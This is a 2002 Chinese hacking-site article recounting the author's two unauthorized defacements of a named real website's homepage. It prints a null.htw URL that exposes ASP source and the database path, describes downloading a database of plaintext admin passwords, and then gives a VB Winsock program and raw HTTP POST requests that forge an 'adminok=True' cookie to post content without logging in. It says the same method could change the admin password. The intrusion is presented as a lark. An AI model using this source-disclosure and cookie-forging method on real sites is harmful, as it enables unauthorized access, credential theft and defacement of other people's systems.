首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
看看SQL是怎么一天内两次改换黑白的首页更新的
来源:vittersafe.tk 作者:vitter 发布时间:2002-08-29  

黑白我可是天天都会去的,他的软件下载用的是CGI来实现的,而首页更新和文章浏览部分则用的是
ASP做的,程序是从ASP动网先锋的那里搞来的原程序。ASP动网先锋他们那里的这套ASP管理程序目
前在网上非常的流行,我已经看到好多地方用来做自己的软件和文章管理程序了,其实我也忍不住
下了一套改了改打算以后自己用的:)
好了,既然有时间就又忍不住想看看他们放ASP程序的主机有什么漏洞没,用我的打碎南瓜一试和~
马上就看到了原程序,地址:
http://www.guanqian.com/null.htw?CiWebHitsFile=/starkun/article/articleconn.asp "amp;CiRestriction=none"amp;CiHiliteType=Full
显示:
"lt;%
dim conn
dim connstr

'on error resume next
connstr="quot;DBQ="quot; server.mappath("quot;book1.mdb"quot;) "quot;;DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"quot;
set conn=server.createobject("quot;ADODB.CONNECTION"quot;)
conn.open connstr
%"gt;

现在傻子也知道该怎么做了吧?把他们的数据库下来以后密码又是明文可见了,哎,想想自己那么努力建站可访问量又是不见起色,就忍不住偷偷在黑白的首页给自己做了广告厚着脸皮夸了自己那里一通(“不要脸,顿时西瓜皮从大家手中向我砸来”)

做完以后呢?当然是高高兴兴的上床睡我的大觉去了,现在北京好冷呀!被子里暖暖呼呼的感觉真好舒服:)

不过今天回来一看,呀!星坤已经把首页上我们的捣乱记录都删掉了(在此期间还有几个大站的站长和我一样厚着脸皮去人家那里给自己做广告去了,就不点名批评了:)。当然还是有点不甘心呀,毕竟我的宣传广告才放了一天不到耶:( 怎么办?好再来试试看,可结果让人失望我用白鸽 打碎南瓜 twwwscan05 都没有看到新的服务器有什么可以看到ASP原码的漏洞,而星坤也已经把数据库的名字改掉了,看来真要没办法了?!?!

快要放弃的时候想起来还可以再好好看看动网先锋那里的原程序,虽然数据库的路径有所改变但还应该有些地方可以利用的吧,果然看看下面的VB脚本的东西:
if request.cookies("quot;adminok"quot;)="quot;"quot; then
response.redirect "quot;login.asp"quot;
end if
在重要管理ASP的程序里都会有这样的简单的判断语句来看看我们是否有改动的权限,如果没有就回到login.asp,在chklogin.asp里有下面的内容:
dim sql
dim rs
dim seekerrs
dim founduser
dim username
dim companyid
dim password
dim errmsg
dim founderr
founderr=false
FoundUser=false
username=trim(request("quot;username"quot;))
password=cstr(Request("quot;password"quot;))

set rs=server.createobject("quot;adodb.recordset"quot;)
sql="quot;select * from admin where id=1"quot;
rs.open sql,conn,1,1
if not(rs.bof and rs.eof) then
if password=rs("quot;password"quot;) and username=rs("quot;username"quot;) then
response.cookies("quot;adminok"quot;)=true 看到没有这里就是我们要伪造的身份证明!
response.redirect "quot;manage.asp"quot;
else
response.write "quot;"lt;link rel='stylesheet' type='text/css' href='style.css'"gt;"quot;
response.write "quot;"lt;body bgcolor='#ffffef'"gt;"quot;
response.write "quot;Sorry,请输入正确的管理员名字和密码"quot;
end if

end if
rs.close
conn.close
set rs=nothing
set conn=nothing

好象我们已经找到了突破口了,如果还不明白的话就和我一起用VB来编个简单的程序:
Private Sub Command1_Click()
Winsock1.Connect
End Sub

Private Sub Form_Load()
Winsock1.Listen
winsock1.localport=80
End Sub

Private Sub Winsock1_Connect()
Winsock1.SendData Text1.Text
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State "lt;"gt; sckClosed Then _
Winsock1.Close
Winsock1.Accept requestID
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
Winsock1.GetData strData
Text2.Text = strData
End Sub
下面我们用他先来在本地监听自己的80端口,然后在本地用自己的下的动网先锋的ASP程序进入管理界面的添加文章的那部分(需要用PWS),然后马上关掉PWS运行我们的这个VB程序监听自己的80端口,当在IE里双击添加后程序收到如下东西:
POST /a/savearticle.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://127.0.0.1/a/addarticle.asp?typeid="quot;"amp;typeid"amp;"quot;
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Content-Length: 58
Connection: Keep-Alive
Cookie: adminok=True; ASPSESSIONIDFFFEUJRV=AIGBFGGDBOKEMGNDGNMCOKCH
看到没有adminok=True就是放在这里发个服务器来确定我们的身份的!下面是我们要添加的文章数据:
txttitle=欢迎来我的熏衣草乐园看看:)"amp;typeid=7"amp;txtcontent=不好意思,星坤兄弟我再次拿下了你的ASP程序,呵呵~~~
大家都来我那里去看看吧!我可是也很勤奋的在每日更新的呀!

minisql.yeah.net"amp;cmdok= 添 加

好了现在我们只要改动以上数据里的几个地方,把它发到黑白的服务器上就可以了:

POST http://www.guanqian.com.cn/starkun/article/savearticle.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://www.guanqian.com.cn/starkun/article/addarticle.asp?typeid="quot;"amp;typeid"amp;"quot;
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: www.guanqian.com.cn
Content-Length: 479
Connection: Keep-Alive
Cookie: adminok=True; ASPSESSIONIDFFFEUJRV=AIGBFGGDBOKEMGNDGNMCOKCH

txttitle=欢迎来我的熏衣草乐园看看:)"amp;typeid=7"amp;txtcontent=不好意思,星坤兄弟我再次拿下了你的ASP程序,呵呵~~~
大家都来我那里去看看吧!我可是也很勤奋的在每日更新的呀!

minisql.yeah.net"amp;cmdok= 添 加

我们还用那个做好的VB程序来把这段代码发到对方服务器的80端口,显示结果为添加文章成功:)
然后在去黑白的首页就又可以看到我厚着脸皮夸自己的文章了,西西系~~~
当然我们还可以做任何星坤可以通过这个ASP程序来做的事情,包括来改密码:)
总结一下嘛就是对付ASP的方法:

最后还是那句话,如果你有什么不懂的或是让我去破什么聊天室 BBS的话还是算了,毕竟人家星坤可是很努力的在做网站没必要去做什么破坏的呀:)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·通过mysql入侵NT和win2000
·SQL server7.0的远程连接问题
·DIY socks5跳板
·SQL数据库的一些攻击
·null.htw 最新利用
·关于妥善安置telnet后门
·7种DoS攻击方法简述
·通过Mysql入侵服务器
·入侵学校主机兼谈思维方法的培养
·看紧你的3306端口,一次通过mysq
·URL欺騙
·黑客防线攻防实验室第二轮1--8关
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved